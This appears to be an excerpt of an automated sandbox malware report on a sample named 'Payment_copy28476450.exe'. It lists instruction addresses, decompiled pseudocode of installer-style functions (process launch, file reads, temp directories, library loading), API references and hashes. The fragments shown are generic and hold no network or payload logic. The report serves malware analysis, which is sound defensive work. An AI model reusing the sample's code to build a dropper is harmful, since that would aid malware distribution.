0x0040687c
0x00000000
0x00000000
0x0040662a
0x0040662a
0x0040662d
0x0040699f
0x0040699f
0x00000000
0x0040699f
0x00000000
0x00406969
0x0040696d
0x0040698f
0x00406992
0x0040699c
0x0040699f
0x0040699f
0x00000000
0x0040699f
0x0040699f
0x0040696f
0x00406972
0x00406976
0x00406979
0x00406979
0x0040697c
0x00000000
0x00000000
0x00406a26
0x00406a2a
0x00406a48
0x00406a48
0x00406a48
0x00406a4f
0x00406a56
0x00406a5d
0x00406a5d
0x00000000
0x00406a5d
0x00406a2c
0x00406a2f
0x00406a32
0x00406a35
0x00406a3c
0x00406980
0x00406980
0x00406983
0x00000000
0x00000000
0x00406b17
0x00406b1a
0x00406a1b
0x00000000
0x00000000
0x00406751
0x00406753
0x0040675a
0x0040675b
0x0040675d
0x00406760
0x00000000
0x00000000
0x00406768
0x0040676b
0x0040676e
0x00406770
0x00406772
0x00406772
0x00406773
0x00406776
0x0040677d
0x00406780
0x0040678e
0x00000000
0x00000000
0x00406a64
0x00406a64
0x00406a67
0x00406a6e
0x00000000
0x00000000
0x00406a73
0x00406a73
0x00406a77
0x00406baf
0x00000000
0x00406baf
0x00406a7d
0x00406a80
0x00406a83
0x00406a87
0x00406a8a
0x00406a90
0x00406a92
0x00406a92
0x00406a92
0x00406a95
0x00406a98
0x00406a98
0x00406a98
0x00406a98
0x00406a9b
0x00406a9b
0x00406a9f
0x00406aff
0x00406b02
0x00406b07
0x00406b08
0x00406b0a
0x00406b0c
0x00406b0f
0x00406a1b
0x00406a1b
0x00000000
0x00406a21
0x00406a1b
0x00406aa1
0x00406aa7
0x00406aaa
0x00406aad
0x00406ab0
0x00406ab3
0x00406ab6
0x00406ab9
0x00406abc
0x00406abf
0x00406ac2
0x00406adb
0x00406ade
0x00406ae1
0x00406ae4
0x00406ae8
0x00406aea
0x00406aea
0x00406aeb
0x00406aee
0x00406ac4
0x00406ac4
0x00406acc
0x00406ad1
0x00406ad3
0x00406ad6
0x00406ad6
0x00406af1
0x00406af8
0x00000000
0x00406afa
0x00000000
0x00406afa
0x00000000
0x00406796
0x00406799
0x004067cf
0x004068ff
0x004068ff
0x004068ff
0x004068ff
0x00406902
0x00406902
0x00406905
0x00406907
0x00406b91
0x00000000
0x00406b91
0x0040690d
0x00406910
0x00000000
0x00000000
0x00406916
0x0040691a
0x0040691d
0x0040691d
0x0040691d
0x00000000
0x0040691d
0x0040679b
0x0040679d
0x0040679f
0x004067a1
0x004067a4
0x004067a5
0x004067a7
0x004067a9
0x004067ac
0x004067af
0x004067c5
0x004067ca
0x00406802
0x00406802
0x00406806
0x00406832
0x00406834
0x0040683b
0x0040683e
0x00406841
0x00406841
0x00406846
0x00406846
0x00406848
0x0040684b
0x00406852
0x00406855
0x00406882
0x00406882
0x00406885
0x00406888
0x004068fc
0x004068fc
0x004068fc
0x00000000
0x004068fc
0x0040688a
0x00406890
0x00406893
0x00406896
0x00406899
0x0040689c
0x0040689f
0x004068a2
0x004068a5
0x004068a8
0x004068ab
0x004068c4
0x004068c6
0x004068c9
0x004068ca
0x004068cd
0x004068cf
0x004068d2
0x004068d4
0x004068d6
0x004068d9
0x004068db
0x004068de
0x004068e2
0x004068e4
0x004068e4
0x004068e5
0x004068e8
0x004068eb
0x004068ad
0x004068ad
0x004068b5
0x004068ba
0x004068bc
0x004068bf
0x004068bf
0x004068ee
0x004068f5
0x0040687f
0x0040687f
0x0040687f
0x0040687f
0x00000000
0x004068f7
0x00000000
0x004068f7
0x004068f5
0x00406808
0x0040680b
0x0040680d
0x00406810
0x00406813
0x00406816
0x00406818
0x0040681b
0x0040681e
0x0040681e
0x00406821
0x00406821
0x00406824
0x0040682b
0x004067ff
0x004067ff
0x004067ff
0x004067ff
0x00000000
0x0040682d
0x00000000
0x0040682d
0x0040682b
0x004067b1
0x004067b4
0x004067b6
0x004067b9
0x00000000
0x00000000
0x00406518
0x00406518
0x0040651c
0x00406b61
0x00000000
0x00406b61
0x00406522
0x00406525
0x00406528
0x0040652b
0x0040652e
0x00406531
0x00406534
0x00406536
0x00406539
0x0040653c
0x0040653f
0x00406541
0x00406541
0x00406541
0x00000000
0x00000000
0x004066a3
0x004066a3
0x004066a7
0x00406b6d
0x00000000
0x00406b6d
0x004066ad
0x004066b0
0x004066b3
0x004066b6
0x004066b8
0x004066b8
0x004066b8
0x004066bb
0x004066be
0x004066c1
0x004066c4
0x004066c7
0x004066ca
0x004066cb
0x004066cd
0x004066cd
0x004066cd
0x004066d0
0x004066d3
0x004066d6
0x004066d9
0x004066d9
0x004066d9
0x004066dc
0x004066de
0x004066de
0x00000000
0x00000000
0x00406920
0x00406920
0x00406920
0x00406924
0x00000000
0x00000000
0x0040692a
0x0040692d
0x00406930
0x00406933
0x00406935
0x00406935
0x00406935
0x00406938
0x0040693b
0x0040693e
0x00406941
0x00406944
0x00406947
0x00406948
0x0040694a
0x0040694a
0x0040694a
0x0040694d
0x00406950
0x00406953
0x00406956
0x00406959
0x0040695d
0x0040695f
0x00406962
0x00000000
0x00406964
0x004066e1
0x004066e1
0x00000000
0x004066e1
0x00406962
0x00406b97
0x00000000
0x00000000
0x004061c6
0x00406bce
0x00406bce
0x00000000
0x00406bce
0x00406a1b
0x004069a2
0x0040699f

Memory Dump Source

Source File: 00000000.00000002.260378589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260373581.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260390196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260395683.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260399979.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260444444.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260497187.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260505230.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_copy28476450.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8be065f2055dc1cd174fd52254904ed3951c4d9a2d1eb8bfd7021972752a86bd
Instruction ID: da41e8a59283c5151f8221a14089d7a30d21e655082da74c54adec62798c0c17
Opcode Fuzzy Hash: 8be065f2055dc1cd174fd52254904ed3951c4d9a2d1eb8bfd7021972752a86bd
Instruction Fuzzy Hash: 3B714771E00229CBDF28CF98C8447ADBBB1FB44305F15816ED856BB291C778AA56DF44

Uniqueness

Uniqueness Score: -1.00%

Function 00401E1B Relevance: 4.5, APIs: 3, Instructions: 48
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00401E1B() {
				void* _t15;
				void* _t24;
				void* _t26;
				void* _t31;

				_t28 = E00402A0C(_t24);
				E00404FE7(0xffffffeb, _t13);
				_t15 = E0040555B(_t28); // executed
				 *(_t31 + 8) = _t15;
				if(_t15 == _t24) {
					 *((intOrPtr*)(_t31 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t31 - 0x20)) != _t24) {
						while(WaitForSingleObject( *(_t31 + 8), 0x64) == 0x102) {
							E004060C3(0xf);
						}
						GetExitCodeProcess( *(_t31 + 8), _t31 - 0xc); // executed
						if( *((intOrPtr*)(_t31 - 0x24)) < _t24) {
							if( *(_t31 - 0xc) != _t24) {
								 *((intOrPtr*)(_t31 - 4)) = 1;
							}
						} else {
							E00405C59(_t26,  *(_t31 - 0xc));
						}
					}
					_push( *(_t31 + 8));
					CloseHandle();
				}
				 *0x424008 =  *0x424008 +  *((intOrPtr*)(_t31 - 4));
				return 0;
			}

0x00401e21
0x00401e26
0x00401e2c
0x00401e33
0x00401e36
0x00402672
0x00401e3c
0x00401e3f
0x00401e50
0x00401e4b
0x00401e4b
0x00401e65
0x00401e6e
0x00401e7e
0x00401e80
0x00401e80
0x00401e70
0x00401e74
0x00401e74
0x00401e6e
0x00401e87
0x00401e8a
0x00401e8a
0x004028a4
0x004028b0

APIs

Part of subcall function 00404FE7: lstrlenA.KERNEL32(0041FD58,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C60,00000000,?), ref: 00405020
Part of subcall function 00404FE7: lstrlenA.KERNEL32(00402C60,0041FD58,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C60,00000000), ref: 00405030
Part of subcall function 00404FE7: lstrcatA.KERNEL32(0041FD58,00402C60,00402C60,0041FD58,00000000,00000000,00000000), ref: 00405043
Part of subcall function 00404FE7: SetWindowTextA.USER32(0041FD58,0041FD58), ref: 00405055
Part of subcall function 00404FE7: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040507B
Part of subcall function 00404FE7: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405095
Part of subcall function 00404FE7: SendMessageA.USER32(?,00001013,?,00000000), ref: 004050A3

Part of subcall function 0040555B: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00422588,Error launching installer), ref: 00405580
Part of subcall function 0040555B: CloseHandle.KERNEL32(?), ref: 0040558D

WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401E55
GetExitCodeProcess.KERNELBASE ref: 00401E65
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401E8A

Memory Dump Source

Source File: 00000000.00000002.260378589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260373581.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260390196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260395683.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260399979.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260444444.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260497187.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260505230.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_copy28476450.jbxd

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
String ID:
API String ID: 3521207402-0
Opcode ID: 1a5498c97b03bf9ad2a802c144142cbddf4fe197977c824e4eb94680ac26f956
Instruction ID: f982a8a4b5a7b7f11f96eebada5615e554ddc2bd3b1688d6a113b967b57f1ffa
Opcode Fuzzy Hash: 1a5498c97b03bf9ad2a802c144142cbddf4fe197977c824e4eb94680ac26f956
Instruction Fuzzy Hash: 3C016D31D04104EBDF11AF91C945A9E7771EB40354F24813BF905B51E1C7794A81DB9E

Uniqueness

Uniqueness Score: -1.00%

Function 0040365C Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040365C() {
				void* _t1;
				void* _t2;
				void* _t4;
				void* _t7;
				signed int _t12;

				_t1 =  *0x409014; // 0xffffffff
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					 *0x409014 =  *0x409014 | 0xffffffff;
				}
				_t2 =  *0x409018; // 0xffffffff
				if(_t2 != 0xffffffff) {
					CloseHandle(_t2);
					 *0x409018 =  *0x409018 | 0xffffffff;
					_t12 =  *0x409018;
				}
				E004036B9();
				_t4 = E00405620(_t7, _t12, "C:\\Users\\engineer\\AppData\\Local\\Temp\\nsg6B4E.tmp\\", 7); // executed
				return _t4;
			}

0x0040365c
0x0040366b
0x0040366e
0x00403670
0x00403670
0x00403677
0x0040367f
0x00403682
0x00403684
0x00403684
0x00403684
0x0040368b
0x00403697
0x0040369d

APIs

CloseHandle.KERNEL32(FFFFFFFF,00000000,00403482,00000000), ref: 0040366E
CloseHandle.KERNEL32(FFFFFFFF,00000000,00403482,00000000), ref: 00403682

Strings

C:\Users\user\AppData\Local\Temp\nsg6B4E.tmp\, xrefs: 00403692

Memory Dump Source

Source File: 00000000.00000002.260378589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260373581.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260390196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260395683.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260399979.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260444444.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260497187.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260505230.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_copy28476450.jbxd

Similarity

API ID: CloseHandle
String ID: C:\Users\user\AppData\Local\Temp\nsg6B4E.tmp\
API String ID: 2962429428-2057289451
Opcode ID: ff0635daa02b02786d4c6060d7483ceeb15bee290bd1bd17e04d86e07ad0f233
Instruction ID: d9e8a33d28c15f53d2eb362b268636166e6a3abf7a8e9a4d7af1e4fffe66201b
Opcode Fuzzy Hash: ff0635daa02b02786d4c6060d7483ceeb15bee290bd1bd17e04d86e07ad0f233
Instruction Fuzzy Hash: 52E08C30900A10A6C230AF7CBE499553B189B41331BA04B26F638F22F2C3395E865AED

Uniqueness

Uniqueness Score: -1.00%

Function 004031D5 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004031D5(void* _a4, long _a8) {
				int _t6;
				long _t10;

				_t10 = _a8;
				_t6 = ReadFile( *0x409014, _a4, _t10,  &_a8, 0); // executed
				if(_t6 == 0 || _a8 != _t10) {
					return 0;
				} else {
					return 1;
				}
			}

0x004031d9
0x004031ec
0x004031f4
0x00000000
0x004031fb
0x00000000
0x004031fd

APIs

ReadFile.KERNELBASE(?,00000000,00000000,00000000,00413120,WCMD_ReadAndParseLine,004030DA,00413120,00004000,?,00000000,?,00402F64,00000004,00000000,00000000), ref: 004031EC

Strings

WCMD_ReadAndParseLine, xrefs: 004031D5

Memory Dump Source

Source File: 00000000.00000002.260378589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260373581.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260390196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260395683.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260399979.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260444444.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260497187.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260505230.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_copy28476450.jbxd

Similarity

API ID: FileRead
String ID: WCMD_ReadAndParseLine
API String ID: 2738559852-1131850939
Opcode ID: 0be395bbe571093c8e78859d05ee89954336de5599fe3087c5eab9dc4054fae4
Instruction ID: d6fbb751533e8173f5cb9bb8eb792094bbd109b1eecd8ff5b75a0af7a5988eec
Opcode Fuzzy Hash: 0be395bbe571093c8e78859d05ee89954336de5599fe3087c5eab9dc4054fae4
Instruction Fuzzy Hash: 77E08C32104118BBDF209F619C05EA73F5CEB053A2F00C037FA25E52A1D230EA149BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x423fb0;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42376c =  *0x42376c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42376c, 0x7530,  *0x423754), 0);
					}
				}
				return 0;
			}

0x0040138a
0x004013fa
0x0040139b
0x004013a0
0x00000000
0x00000000
0x004013a2
0x004013a3
0x004013ad
0x00000000
0x00401404
0x004013b0
0x004013b7
0x004013bd
0x004013be
0x004013c0
0x004013c2
0x004013b9
0x004013b9
0x004013ba
0x004013ba
0x004013c9
0x004013cb
0x004013f4
0x004013f4
0x004013c9
0x00000000

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageA.USER32(00000020,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.260378589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260373581.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260390196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260395683.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260399979.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260444444.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260497187.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260505230.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_copy28476450.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: cbf58c645cd0bca2d3f8e9800932a6635a1f6a75dc97f939ce2f6e9f6cf97e13
Instruction ID: eb1965022be8e41d6b0e1b01d22ae835c185752925051d09dc6a9c457a4677e5
Opcode Fuzzy Hash: cbf58c645cd0bca2d3f8e9800932a6635a1f6a75dc97f939ce2f6e9f6cf97e13
Instruction Fuzzy Hash: 5B01F471B242119BEB195F389D04B2A36A8E750319F10813BF851F66F1D67CDC029B8D

Uniqueness

Uniqueness Score: -1.00%

Function 00406087 Relevance: 3.0, APIs: 2, Instructions: 22
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406087(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x409248);
				_t5 = GetModuleHandleA( *(_t10 + 0x409248));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40924c));
				}
				_t5 = E0040601D(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}

0x0040608f
0x00406092
0x00406099
0x004060a1
0x004060ad
0x00000000
0x004060b4
0x004060a4
0x004060ab
0x00000000
0x004060bc
0x00000000

APIs

GetModuleHandleA.KERNEL32(?,?,00000000,004032BB,0000000D,SETUPAPI,USERENV,UXTHEME), ref: 00406099
GetProcAddress.KERNEL32(00000000,?), ref: 004060B4

Part of subcall function 0040601D: GetSystemDirectoryA.KERNEL32 ref: 00406034
Part of subcall function 0040601D: wsprintfA.USER32 ref: 0040606D
Part of subcall function 0040601D: LoadLibraryA.KERNELBASE(?), ref: 0040607D

Memory Dump Source

Source File: 00000000.00000002.260378589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260373581.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260390196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260395683.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260399979.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260444444.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260497187.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260505230.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_copy28476450.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 2602b990a6be508378c6e42cd022796474ee903161cb72c2cb5a68df28a06255
Instruction ID: 21d738a59780ab69202fff5272367df6aef59ea6a60bf168f6e21a2e897772da
Opcode Fuzzy Hash: 2602b990a6be508378c6e42cd022796474ee903161cb72c2cb5a68df28a06255
Instruction Fuzzy Hash: 0EE086326441106AD621DA749D0496B72AC9E84740702487EF906F6191D7389C219A6A

Uniqueness

Uniqueness Score: -1.00%

Function 004059D2 Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E004059D2(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}

0x004059d6
0x004059e3
0x004059f8
0x004059fe

APIs

GetFileAttributesA.KERNELBASE(00000003,00402CCB,C:\Users\user\Desktop\Payment_copy28476450.exe,80000000,00000003), ref: 004059D6
CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059F8

Memory Dump Source

Source File: 00000000.00000002.260378589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260373581.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260390196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260395683.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260399979.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260444444.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260497187.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260505230.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_copy28476450.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 6d56aff3fab625e069b8f0f4beb3d6c68df7a2746e2dd21b0a72e0224e52029a
Instruction ID: 90a47e22fdd321f70bf06df01bfdefa11f3e73682391c7296034eb3a8fe04f39
Opcode Fuzzy Hash: 6d56aff3fab625e069b8f0f4beb3d6c68df7a2746e2dd21b0a72e0224e52029a
Instruction Fuzzy Hash: 8CD09E31658301AFEF098F20DD1AF2E7AA2EB84B00F10562CB646940E0D6715815DB16

Uniqueness

Uniqueness Score: -1.00%

Function 00405526 Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405526(CHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryA(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}

0x0040552c
0x00405534
0x00000000
0x0040553a
0x00000000

APIs

CreateDirectoryA.KERNELBASE(?,00000000,00403242,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004033DB), ref: 0040552C
GetLastError.KERNEL32 ref: 0040553A

Memory Dump Source

Source File: 00000000.00000002.260378589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260373581.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260390196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260395683.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260399979.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260444444.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260497187.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260505230.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_copy28476450.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 62594c709cce2f5b8fb8ca5d54e7f3286412bfa0f130784d9dc04a2d264f0cc1
Instruction ID: ef4cf1633336d89bd9081ea15a94d355bc31ae876b4da9069c07bcdb8eac4916
Opcode Fuzzy Hash: 62594c709cce2f5b8fb8ca5d54e7f3286412bfa0f130784d9dc04a2d264f0cc1
Instruction Fuzzy Hash: 9DC08C30A08101BAD7100B30EE08B073AA5AB00340F104435A206E40F4D6349000CD3E

Uniqueness

Uniqueness Score: -1.00%

Function 004059B3 Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004059B3(CHAR* _a4) {
				signed char _t3;
				int _t5;

				_t3 = GetFileAttributesA(_a4); // executed
				if(_t3 != 0xffffffff) {
					_t5 = SetFileAttributesA(_a4, _t3 & 0x000000fe); // executed
					return _t5;
				}
				return _t3;
			}

0x004059b7
0x004059c0
0x004059c9
0x00000000
0x004059c9
0x004059cf

APIs

GetFileAttributesA.KERNELBASE(?,004057BE,?,?,?), ref: 004059B7
SetFileAttributesA.KERNELBASE(?,00000000), ref: 004059C9

Memory Dump Source

Source File: 00000000.00000002.260378589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260373581.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260390196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260395683.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260399979.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260444444.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260497187.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260505230.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_copy28476450.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 074f941138e9f1df105fff9ec0b177d36ae7deb3ea45ba36f2ce8c3e98632dd9
Instruction ID: 1a2f65c413df3ce73f95872002610f1c5d23223b0cff369f14e5668d8f4fdbee
Opcode Fuzzy Hash: 074f941138e9f1df105fff9ec0b177d36ae7deb3ea45ba36f2ce8c3e98632dd9
Instruction Fuzzy Hash: 3CC04CF1818641ABD6015B34DF4D81F7F66EB50321B108B35F169A01F0CB315C66DA1A

Uniqueness

Uniqueness Score: -1.00%

Function 00403207 Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403207(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409014, _a4, 0, 0); // executed
				return _t2;
			}

0x00403215
0x0040321b

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EB3,?), ref: 00403215

Memory Dump Source

Source File: 00000000.00000002.260378589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260373581.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260390196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260395683.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260399979.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260444444.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260497187.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260505230.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_copy28476450.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 1fe8ad6970e23be315a08abdb90e0b058f57890677f29add635e0ec7003afc6f
Instruction ID: 89776e93a0172b97a38fb7948c015c90ed7fb14eba3da05579cbd58eb2c2bcc6
Opcode Fuzzy Hash: 1fe8ad6970e23be315a08abdb90e0b058f57890677f29add635e0ec7003afc6f
